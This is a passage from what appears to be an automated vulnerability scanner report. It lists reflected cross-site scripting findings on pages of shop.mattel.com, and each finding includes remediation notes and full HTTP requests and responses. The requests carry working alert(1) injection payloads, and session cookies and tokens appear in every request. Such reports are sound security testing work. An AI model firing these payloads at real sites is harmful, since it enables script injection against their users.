X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38193


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="c7b99"-alert(1)-"9bd2d3d4d38=1";
   </script>
...[SNIP]...

1.56. https://shop.mattel.com/affiliate/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /affiliate/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload da39a--><script>alert(1)</script>877791f5b35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /affiliate/index.jsp?da39a--><script>alert(1)</script>877791f5b35=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:02 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38225


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<!-- === Request Query String: da39a--><script>alert(1)</script>877791f5b35=1 -->
...[SNIP]...

1.57. https://shop.mattel.com/brand/index.jsp [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3ced"-alert(1)-"5910eac9a7a was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/index.jsp?categoryId=3768131c3ced"-alert(1)-"5910eac9a7a HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:57 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31915


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="categoryId=3768131c3ced"-alert(1)-"5910eac9a7a";
   </script>
...[SNIP]...

1.58. https://shop.mattel.com/brand/index.jsp [categoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The value of the categoryId request parameter is copied into an HTML comment. The payload 30414--><script>alert(1)</script>ed84d125fcc was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /brand/index.jsp?categoryId=376813130414--><script>alert(1)</script>ed84d125fcc HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:58 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31947


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<!-- === Request Query String: categoryId=376813130414--><script>alert(1)</script>ed84d125fcc -->
...[SNIP]...

1.59. https://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95e25"-alert(1)-"dca41e50f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/index.jsp?95e25"-alert(1)-"dca41e50f50=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:56 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36543


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="95e25"-alert(1)-"dca41e50f50=1";
   </script>
...[SNIP]...

1.60. https://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload fb987--><script>alert(1)</script>1b3aab43a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /brand/index.jsp?fb987--><script>alert(1)</script>1b3aab43a=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:58 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36581


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<!-- === Request Query String: fb987--><script>alert(1)</script>1b3aab43a=1 -->
...[SNIP]...

1.61. https://shop.mattel.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /checkout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 593fd"-alert(1)-"60a7e7979cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index.jsp?process=myaccount&593fd"-alert(1)-"60a7e7979cb=1 HTTP/1.1
Host: shop.mattel.com
Connection: keep-alive
Referer: https://shop.mattel.com/checkout/index.jsp?process=login
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; __g_c=w%3A1%7Cb%3A4%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084615922}; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:43 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="process=myaccount&593fd"-alert(1)-"60a7e7979cb=1";
   </script>
...[SNIP]...

1.62. https://shop.mattel.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /checkout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d4795--><script>alert(1)</script>7a3578d3d18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /checkout/index.jsp?process=myaccount&d4795--><script>alert(1)</script>7a3578d3d18=1 HTTP/1.1
Host: shop.mattel.com
Connection: keep-alive
Referer: https://shop.mattel.com/checkout/index.jsp?process=login
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; __g_c=w%3A1%7Cb%3A4%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084615922}; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:44 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<!-- === Request Query String: process=myaccount&d4795--><script>alert(1)</script>7a3578d3d18=1 -->
...[SNIP]...

1.63. https://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /emailSignup/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8323d--><script>alert(1)</script>25b88f59a0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /emailSignup/index.jsp?8323d--><script>alert(1)</script>25b88f59a0c=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:58 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control:
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51377


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<!-- === Request Query String: 8323d--><script>alert(1)</script>25b88f59a0c=1 -->
...[SNIP]...

1.64. https://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /emailSignup/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77927"-alert(1)-"63de54cd57b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /emailSignup/index.jsp?77927"-alert(1)-"63de54cd57b=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:56 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control:
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51329


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="77927"-alert(1)-"63de54cd57b=1";
   </script>
...[SNIP]...

1.65. https://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /giftCertificates/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7155e--><script>alert(1)</script>64bb62cd0af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /giftCertificates/index.jsp?7155e--><script>alert(1)</script>64bb62cd0af=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:03 GMT
